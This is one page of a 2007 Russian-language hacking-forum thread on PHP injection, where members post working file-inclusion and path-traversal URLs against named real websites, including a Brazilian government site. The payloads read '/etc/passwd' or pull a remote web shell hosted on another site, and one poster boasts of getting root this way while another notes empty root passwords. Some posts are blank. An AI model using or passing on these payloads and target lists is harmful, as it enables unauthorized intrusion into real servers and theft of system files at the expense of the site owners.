PHP Иньекции

Discussion in 'Уязвимости' started by Joker-jar, 20 Apr 2007.

Page 5 of 72
  1. ForWarD-Hack

    ForWarD-Hack New Member

    Joined:
    22 Jan 2007
    Messages:
    7
    Likes Received:
    3
    Reputations:
    0
    админы жгут.. :)) пасы на рута в 1й из баз пустые.. +)
     
    #81 ForWarD-Hack, 21 May 2007
    1 person likes this.
  2. ForWarD-Hack

    ForWarD-Hack New Member

    Joined:
    22 Jan 2007
    Messages:
    7
    Likes Received:
    3
    Reputations:
    0
    include ""; =)
     
    #82 ForWarD-Hack, 21 May 2007
    1 person likes this.
  3. ForWarD-Hack

    ForWarD-Hack New Member

    Joined:
    22 Jan 2007
    Messages:
    7
    Likes Received:
    3
    Reputations:
    0
    виндя ;)

    но при желании можно сделать удалённый ;)



    Пока всё... скоро будет пополнение.. у мну ещё скулей много :(
     
    #83 ForWarD-Hack, 21 May 2007
  4. Scipio

    Scipio Well-Known Member

    Joined:
    2 Nov 2006
    Messages:
    733
    Likes Received:
    544
    Reputations:
    190
    всеми любимый дом2, правда только wap пока...

    http://wap.dom2.ru/index.php?area=../../../../../../../../../etc/passwd%00

    или

    http://wap.dom2.ru:81/index.php?area=../../../../../../../../../etc/passwd%00
     
    #84 Scipio, 21 May 2007
    3 people like this.
  5. Grey

    Grey Banned

    Joined:
    10 Jun 2006
    Messages:
    1,047
    Likes Received:
    1,315
    Reputations:
    1,159
    Code:
    http://www.33rus.ru/modules/Forums/admin/index.php?phpbb_root_path=[url]?
     
    #85 Grey, 22 May 2007
    Last edited: 22 May 2007
    2 people like this.
  6. NOmeR1

    NOmeR1 Everybody lies

    Joined:
    2 Jun 2006
    Messages:
    1,068
    Likes Received:
    783
    Reputations:
    213
    1.
     
    #86 NOmeR1, 23 May 2007
    Last edited: 23 May 2007
    3 people like this.
  7. Muhacir

    Muhacir Elder - Старейшина

    Joined:
    5 Oct 2006
    Messages:
    91
    Likes Received:
    51
    Reputations:
    -2
    http://www.proteger.org.ar/download.php?file=[local]
     
    #87 Muhacir, 26 May 2007
  8. Scipio

    Scipio Well-Known Member

    Joined:
    2 Nov 2006
    Messages:
    733
    Likes Received:
    544
    Reputations:
    190
    Code:
    http://www.starcat-dev.de/display.php?file=24&lan=[сайт]
    вместо [сайт] соответственно адрес сайта вида http://site.narod.ru на котором есть шелл с названием shortnews.txt

    ЗЫ кстати благодаря этой инъекции я получил root, без использования сплойтов и не расшифровывая хешей
     
    #88 Scipio, 27 May 2007
    1 person likes this.
  9. NOmeR1

    NOmeR1 Everybody lies

    Joined:
    2 Jun 2006
    Messages:
    1,068
    Likes Received:
    783
    Reputations:
    213
    Это не инклуды, это require_once, но разницы походу никакой..
    1.
     
    #89 NOmeR1, 28 May 2007
    Last edited: 28 May 2007
  10. NOmeR1

    NOmeR1 Everybody lies

    Joined:
    2 Jun 2006
    Messages:
    1,068
    Likes Received:
    783
    Reputations:
    213
    1.
    2.
     
    #90 NOmeR1, 29 May 2007
    Last edited: 29 May 2007
  11. SWAT

    SWAT Elder - Старейшина

    Joined:
    14 Dec 2006
    Messages:
    198
    Likes Received:
    196
    Reputations:
    -7
    http://www.ssa.ro/domenii/index.php?main=../../../../../../../../etc/passwd

    http://www.host-power.de/html/index.php?main=
     
    #91 SWAT, 30 May 2007
    Last edited: 30 May 2007
  12. NOmeR1

    NOmeR1 Everybody lies

    Joined:
    2 Jun 2006
    Messages:
    1,068
    Likes Received:
    783
    Reputations:
    213
    1.
    2. Windows NT.
     
    #92 NOmeR1, 30 May 2007
    Last edited: 30 May 2007
  13. SWAT

    SWAT Elder - Старейшина

    Joined:
    14 Dec 2006
    Messages:
    198
    Likes Received:
    196
    Reputations:
    -7
    http://simleyvolleyball.com/index.php?main=
     
    #93 SWAT, 30 May 2007
  14. Scipio

    Scipio Well-Known Member

    Joined:
    2 Nov 2006
    Messages:
    733
    Likes Received:
    544
    Reputations:
    190
    бразильский gov...

    Code:
    http://www.tre-to.gov.br/conteudo.php?pg=/etc/passwd
    всместо... /etc/passwd можно попробовать подставить урлу шелла, но у меня не получилось, т.к. бразилия и океан между нами... как вариант, можно попробовать шелл с какого нить бразильского сервака, (для новичков: шелл лучше с расширением например txt)...

    кста... красиво...
    Сегодня 21:36 ответов
    от Scipio 100
     
    #94 Scipio, 30 May 2007
    Last edited: 30 May 2007
    1 person likes this.
  15. ~!DoK_tOR!~

    ~!DoK_tOR!~ Banned

    Joined:
    10 Nov 2006
    Messages:
    673
    Likes Received:
    357
    Reputations:
    44
    хз чё за сайт =\

     
    #95 ~!DoK_tOR!~, 31 May 2007
  16. NOmeR1

    NOmeR1 Everybody lies

    Joined:
    2 Jun 2006
    Messages:
    1,068
    Likes Received:
    783
    Reputations:
    213
    1.
    2.
     
    #96 NOmeR1, 1 Jun 2007
    Last edited: 1 Jun 2007
    3 people like this.
  17. ~!DoK_tOR!~

    ~!DoK_tOR!~ Banned

    Joined:
    10 Nov 2006
    Messages:
    673
    Likes Received:
    357
    Reputations:
    44
    =\\

     
    #97 ~!DoK_tOR!~, 4 Jun 2007
  18. NOmeR1

    NOmeR1 Everybody lies

    Joined:
    2 Jun 2006
    Messages:
    1,068
    Likes Received:
    783
    Reputations:
    213
    1. Вроди не выкладовался :)
     
    #98 NOmeR1, 4 Jun 2007
    3 people like this.
  19. l1ght

    l1ght Elder - Старейшина

    Joined:
    5 Dec 2006
    Messages:
    191
    Likes Received:
    678
    Reputations:
    333
    =\
    Code:
    http://www.xx.inattack.ru/index.php?page=index.php%00
     
    #99 l1ght, 4 Jun 2007
  20. ~!DoK_tOR!~

    ~!DoK_tOR!~ Banned

    Joined:
    10 Nov 2006
    Messages:
    673
    Likes Received:
    357
    Reputations:
    44
    =\\

     
    #100 ~!DoK_tOR!~, 5 Jun 2007
    Last edited: 6 Jun 2007
    1 person likes this.
(You must log in or sign up to post here.)
Page 5 of 72
Language
English (US)
    ANTICHAT ™ © 2001-2027 Antichat Kft.